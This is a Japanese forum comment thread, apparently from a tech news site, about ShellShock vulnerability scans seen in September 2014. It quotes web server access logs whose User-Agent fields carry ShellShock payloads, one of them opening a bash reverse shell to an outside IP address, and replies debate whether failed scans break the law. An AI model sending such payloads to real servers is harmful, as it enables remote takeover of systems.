アカウント名:
パスワード:
自分の所のログを出すのは気が引けるので、他所の記事ですが。
http://www.agilegroup.co.jp/technote/modsec-crs-shellshock.html [agilegroup.co.jp]
>c2-54-251-83-67.ap-southeast-1.compute.amazonaws.com - - [26/Sep/2014:18:10:52 +0900] "GET / HTTP/1.1" 302 - "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a">202.38.120.248 - - [26/Sep/2014:20:37:24 +0900] "GET / HTTP/1.0" 302 - "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.101/3333 0>&1'">109.95.210.196 - - [26/Sep/2014:22:20:18 +09
抵触でしょうね。それに限らず、他のパターンも昔からいっぱい来てますが。
スキャン成功してるの?成功しなければ未遂なので抵触はしないですよ。もちろん道徳的に未遂が許されるわけではないですが。
より多くのコメントがこの議論にあるかもしれませんが、JavaScriptが有効ではない環境を使用している場合、クラシックなコメントシステム(D1)に設定を変更する必要があります。
にわかな奴ほど語りたがる -- あるハッカー
ShellShockスキャナは結構来ていた (スコア:2, 興味深い)
自分の所のログを出すのは気が引けるので、他所の記事ですが。
http://www.agilegroup.co.jp/technote/modsec-crs-shellshock.html [agilegroup.co.jp]
>c2-54-251-83-67.ap-southeast-1.compute.amazonaws.com - - [26/Sep/2014:18:10:52 +0900] "GET / HTTP/1.1" 302 - "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
>202.38.120.248 - - [26/Sep/2014:20:37:24 +0900] "GET / HTTP/1.0" 302 - "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.101/3333 0>&1'"
>109.95.210.196 - - [26/Sep/2014:22:20:18 +09
Re: (スコア:0)
抵触でしょうね。それに限らず、他のパターンも昔からいっぱい来てますが。
Re:ShellShockスキャナは結構来ていた (スコア:0)
スキャン成功してるの?
成功しなければ未遂なので抵触はしないですよ。
もちろん道徳的に未遂が許されるわけではないですが。